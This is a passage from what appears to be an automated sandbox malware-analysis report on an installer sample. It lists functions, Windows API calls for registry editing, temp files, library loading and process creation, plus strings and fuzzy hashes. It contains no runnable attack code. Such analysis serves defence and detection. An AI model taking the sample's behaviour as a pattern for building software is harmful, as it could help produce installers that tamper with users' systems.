                                                  • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                  • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                  Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 770 4056e4-40572f CreateDirectoryA 771 405731-405733 770->771 772 405735-405742 GetLastError 770->772 773 40575c-40575e 771->773 772->773 774 405744-405758 SetFileSecurityA 772->774 774->771 775 40575a GetLastError 774->775 775->773
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                  • GetLastError.KERNEL32 ref: 0040573B
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                  • GetLastError.KERNEL32 ref: 0040575A
                                                  Strings
                                                  • C:\Users\user\Desktop, xrefs: 004056E4
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-26219170
                                                  • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                  • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                  • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                  • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                  Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 776 406492-4064b2 GetSystemDirectoryA 777 4064b4 776->777 778 4064b6-4064b8 776->778 777->778 779 4064c8-4064ca 778->779 780 4064ba-4064c2 778->780 782 4064cb-4064fd wsprintfA LoadLibraryExA 779->782 780->779 781 4064c4-4064c6 780->781 781->782
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                  • wsprintfA.USER32 ref: 004064E2
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                  • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                  • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                  • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                  Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 783 405cbf-405cc9 784 405cca-405cf5 GetTickCount GetTempFileNameA 783->784 785 405d04-405d06 784->785 786 405cf7-405cf9 784->786 788 405cfe-405d01 785->788 786->784 787 405cfb 786->787 787->788
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405CD3
                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                  Strings
                                                  • nsa, xrefs: 00405CCA
                                                  • "C:\Users\user\Desktop\LkzvfB4VFj.exe", xrefs: 00405CBF
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3617905447
                                                  • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                  • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                  • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                  • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                  Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 789 402cd0-402cf9 call 405f7d 791 402cfe-402d02 789->791 792 402db3-402db7 791->792 793 402d08-402d0c 791->793 794 402d31-402d44 793->794 795 402d0e-402d2f RegEnumValueA 793->795 797 402d6d-402d74 RegEnumKeyA 794->797 795->794 796 402d98-402da6 RegCloseKey 795->796 796->792 798 402d46-402d48 797->798 799 402d76-402d88 RegCloseKey call 406500 797->799 798->796 800 402d4a-402d5e call 402cd0 798->800 805 402da8-402dae 799->805 806 402d8a-402d96 RegDeleteKeyA 799->806 800->799 807 402d60-402d6c 800->807 805->792 806->792 807->797
                                                  APIs
                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                  • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                  • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                  • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                  Function 6FEB16DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 808 6feb16db-6feb1717 call 6feb1a98 812 6feb171d-6feb1721 808->812 813 6feb1834-6feb1836 808->813 814 6feb172a-6feb1737 call 6feb22f1 812->814 815 6feb1723-6feb1729 call 6feb22af 812->815 820 6feb1739-6feb173e 814->820 821 6feb1767-6feb176e 814->821 815->814 824 6feb1759-6feb175c 820->824 825 6feb1740-6feb1741 820->825 822 6feb178e-6feb1792 821->822 823 6feb1770-6feb178c call 6feb24d8 call 6feb1559 call 6feb1266 GlobalFree 821->823 830 6feb17dc-6feb17e2 call 6feb24d8 822->830 831 6feb1794-6feb17da call 6feb156b call 6feb24d8 822->831 847 6feb17e3-6feb17e7 823->847 824->821 826 6feb175e-6feb175f call 6feb2cc3 824->826 828 6feb1749-6feb174a call 6feb2a38 825->828 829 6feb1743-6feb1744 825->829 840 6feb1764 826->840 843 6feb174f 828->843 835 6feb1751-6feb1757 call 6feb26b2 829->835 836 6feb1746-6feb1747 829->836 830->847 831->847 846 6feb1766 835->846 836->821 836->828 840->846 843->840 846->821 851 6feb17e9-6feb17f7 call 6feb249e 847->851 852 6feb1824-6feb182b 847->852 858 6feb17f9-6feb17fc 851->858 859 6feb180f-6feb1816 851->859 852->813 854 6feb182d-6feb182e GlobalFree 852->854 854->813 858->859 860 6feb17fe-6feb1806 858->860 859->852 861 6feb1818-6feb1823 call 6feb14e2 859->861 860->859 862 6feb1808-6feb1809 FreeLibrary 860->862 861->852 862->859
                                                  APIs
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D09
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D0E
                                                    • Part of subcall function 6FEB1A98: GlobalFree.KERNEL32(?), ref: 6FEB1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB1786
                                                  • FreeLibrary.KERNEL32(?), ref: 6FEB1809
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB182E
                                                    • Part of subcall function 6FEB22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB22E0
                                                    • Part of subcall function 6FEB26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FEB1757,00000000), ref: 6FEB2782
                                                    • Part of subcall function 6FEB156B: wsprintfA.USER32 ref: 6FEB1599
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 0e8c0b6f1598787ff33c91ab189a2414992288bd702504909afb2a28a74f785e
                                                  • Instruction ID: 1a24e5f7d9adb198f4e7a0f2daaaad3c409361033a8e77dec485a85eb0470775
                                                  • Opcode Fuzzy Hash: 0e8c0b6f1598787ff33c91ab189a2414992288bd702504909afb2a28a74f785e
                                                  • Instruction Fuzzy Hash: 774180710053159BCB019FF49BC4BD53FADBF07338F24842EE9159A286DB78A445CBA1
                                                  Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 865 401c2e-401c4e call 402bac * 2 870 401c50-401c57 call 402bce 865->870 871 401c5a-401c5e 865->871 870->871 873 401c60-401c67 call 402bce 871->873 874 401c6a-401c70 871->874 873->874 877 401c72-401c8e call 402bac * 2 874->877 878 401cbe-401ce4 call 402bce * 2 FindWindowExA 874->878 889 401c90-401cac SendMessageTimeoutA 877->889 890 401cae-401cbc SendMessageA 877->890 888 401cea 878->888 891 401ced-401cf0 888->891 889->891 890->888 892 401cf6 891->892 893 402a5a-402a69 891->893 892->893
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                  • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                  • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                  • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                  Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 896 402476-4024a7 call 402bce * 2 call 402c5e 903 402a5a-402a69 896->903 904 4024ad-4024b7 896->904 905 4024c7-4024ca 904->905 906 4024b9-4024c6 call 402bce lstrlenA 904->906 909 4024e1-4024e4 905->909 910 4024cc-4024e0 call 402bac 905->910 906->905 912 4024f5-402509 RegSetValueExA 909->912 913 4024e6-4024f0 call 4030d8 909->913 910->909 917 40250b 912->917 918 40250e-4025eb RegCloseKey 912->918 913->912 917->918 918->903
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000023,00000011,00000002), ref: 004024C1
                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 00402501
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi9279.tmp,00000000,00000011,00000002), ref: 004025E5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi9279.tmp
                                                  • API String ID: 2655323295-2586841839
                                                  • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                  • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                  • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                  • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                  Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                  • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                  • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                  • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                  Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                    • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                  Strings
                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                  • API String ID: 1892508949-2736763094
                                                  • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                  • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                  • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                  • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                  Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                  • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                  • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                  Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                  • CloseHandle.KERNEL32(?), ref: 004057CC
                                                  Strings
                                                  • Error launching installer, xrefs: 004057A9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
